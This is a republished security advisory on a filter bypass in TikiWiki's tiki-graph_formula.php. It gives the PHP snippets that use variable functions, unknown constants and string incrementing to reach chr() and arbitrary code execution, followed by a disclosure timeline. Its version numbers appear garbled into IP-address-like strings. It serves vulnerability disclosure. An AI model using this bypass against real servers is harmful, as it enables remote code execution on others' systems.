The information has been provided by Stefan Esser.
The original article can be found at: http://www.sektioneins.de/advisories/SE-2007-01.txt
* TikiWiki version 184.108.40.206 and prior
* TikiWiki version 220.127.116.11
TikiWiki's tiki-graph_formula.php creates an anonymous function with PHP's create_function() to dynamically evaluate a mathematical function supplied by the user through the 'f' URL parameter.
To protect against arbitrary PHP code execution the TikiWiki developers have combined a blacklist and white-list approach. On the one hand they have blacklisted three characters and on the other hand they only allow certain alphanumerical strings in the user input.
The three blacklisted characters are
` - Allows execution of shell commands
' - String delimiter
" - String delimiter
The white-list of allowed alphanumerical string does only contain mathematical function names like: sin, cos, tan, pow, ...
When TikiWiki was audited by ShAnKaR he discovered that the white-list check was incorrectly implemented and it was therefore possible to execute any PHP function. This vulnerability is known as CVE-2007-5423 and was fixed with the TikiWiki 18.104.22.168 update.
Unfortunately the repaired white-list does not protect against arbitrary PHP code execution because PHP supports variable functions and variable variables.
$varname = 'othervar';
$$varname = 4; // set $othervar to 4
$funcname = 'chr';
$funcname(95); // call chr(95)
Because TikiWiki's blacklist does not protect against the '$' character, the injected PHP formulas can use temporary variables like $sin, $cos, $tan, ...
It is therefore obvious that the protection can be bypassed by filling the temporary variables with strings representing names of other functions. Because of TikiWiki's black- and white-list this is a little bit tricky but possible.
First of all it seems hard to get any string at all into one of our temporary variables because all allowed functions only return numbers. There are however two PHP features that help: array to string conversion and handling of unknown constants.
$sin=cosh; // cosh is an unknown constant.
// PHP assumes the string 'cosh' as value
$sin=pi(); // Creates an array
$sin=$sin.$sin; // Stringconcats of arrays. Array to string
// conversion. Becomes 'ArrayArray'
Using these tricks in combination with the ++ Operator that also allows incrementing alphanumerical strings it is possible to for example call the chr() function like this.
$tan=pi()-pi(); // Get 0 into $tan
$sin=cosh; // Get the string 'cosh' into $sin
$min=$sin[$tan]; // Get 'c' into $min
$tan++; // Get 1 into $tan
$min.=$sin[$tan+$tan+$tan] // Append 'h' to 'c'
$min.=$sin[$tan]; // Append 'o' to 'ch'
$min++; // Increment 'cho' to 'chp'
$min++; // Increment 'chp' to 'chq'
$min++; // Increment 'chq' to 'chr'
$min($tan) // Call chr(1)
With access to the chr() function it is possible to create all kind of strings and therefore call any other function, which obviously leads to arbitrary PHP code execution.
14. October 2007 - Notified firstname.lastname@example.org, patch in CVS
25. October 2007 - TikiWiki developers released TikiWiki 22.214.171.124
26. October 2007 - TikiWiki developers released TikiWiki 126.96.36.199
29. October 2007 - Public Disclosure